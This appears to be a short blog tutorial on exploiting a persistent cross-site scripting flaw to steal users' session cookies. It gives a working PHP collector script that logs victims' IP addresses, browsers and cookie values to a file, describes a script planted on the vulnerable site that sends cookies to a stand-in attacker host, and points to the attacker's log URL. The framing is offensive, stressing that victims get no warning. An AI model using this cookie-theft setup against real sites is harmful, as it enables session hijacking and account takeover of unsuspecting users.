I’ve seen many tutorials over the last few months regarding the good old: alert(‘XSS’) piece of XSS, but in essence this does very little for you – it just proves that the site is vulnerable to XSS.
So a good way to really exploit and make use of a persistent XSS vulnerability is to do the following:
- You need to setup a site where you can store the information you collect from the victim site. (this destination needs to be accessible over the www or at least the victim server/site)
- Create a script that will allow the attacker website to accept the retrieved cookie information – call it getsumcookies.php:
<?php$ip = $_SERVER[‘REMOTE_ADDR’];
$browser = $_SERVER[‘HTTP_USER_AGENT’];
$fp = fopen(‘getsumcookies.txt’, ‘a’);
fwrite($fp, $ip.’ ‘.$browser.” \n”);
fwrite($fp, urldecode($_SERVER[‘QUERY_STRING’]). ” \n\n”);
- Create a script that you will use on the victim site that will be used to retrieve the cookie/s and post it to your attacker site:
- Any user that will connect to the vulnerable, and now exploited, page will send his cookies to the attacker site and can be browsed by the attacker by visiting:
http://attackersite.site/getsumcookies.txt.The scary thing about this is that it is completely transparent to the users connecting to the website and there will be no indication that they are sending their authenticated cookie value to another website.